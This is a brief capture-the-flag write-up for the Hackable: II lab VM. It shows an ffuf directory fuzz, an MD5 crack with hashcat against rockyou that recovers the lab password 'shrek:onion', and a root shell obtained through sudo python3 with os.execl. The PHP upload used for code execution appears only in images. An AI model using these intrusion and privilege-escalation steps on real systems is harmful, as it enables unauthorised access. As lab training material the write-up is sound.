Last updated: 15 Apr 24 09:28:45 (UTC)

Write-Up Hackable-II

Hackable-II

By Lawcky 07/01/24

Introduction

an easy vm

Difficulty : Easy

Additionnal info :

Name: Hackable: II
Release date: 15 Jun 2021
Author: Elias Sousa
Series: Hackable

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

In this write-up

  • nmap
  • nikto
  • ffuf
  • hashcat
  • ftp
  • uploading rce using ftp
  • python (os module)

Write-UP

FUZZING

ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.43/FUZZ -fc 403

fuzzed : FUZZ .FUZZ FUZZ.txt .FUZZ.txt

5581a2636fb62ee2c1f3c54b4c232a42.png

Understanding the site

in the ftp connection we find

a7cca4d0fbec325b43591db97b56e72f.png

which means the ftp files are accessible at http://192.168.1.43/files/**ourfiles**

lets try to add a php file to the ftp to execute code on the server.

7c5533d60b4635a8c1e8a8f438451efc.png

f87e2303e1e8c863a230c9bf0c28fbf0.png

It Worked !

Privilege Escalation

www-data to user shrek

ae2801290e611cd262741748cff3d937.png

in order to find this hidden file :

find / -name .runme.sh 2>/dev/null

ec6e82c0562abaa614220ba35743e7de.png

46081682d550f61785251c9143bb3a06.png

hashcat -m 0 hash /usr/share/rockyou.txt

7ab39aa57cb6a8e27bb3805be507a8c2.png

shrek:onion

2c8396c78298669883a43acc9b6a5af5.png

632cc40bf2e1d2a2dee4e002964418e0.png first flag found

from shrek to root

sudo -l

e1d37a8a66bb8f4b165335a415c02701.png

we can easily exploit this to get a root shell using the “os” module of python

sudo /usr/bin/python3.5

import os;

os.execl("/bin/sh", "sh", "-p")

38045127e156f968352160558af66e00.png

684bc6b5e19c13817851af7d83029279.png

got second flag

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.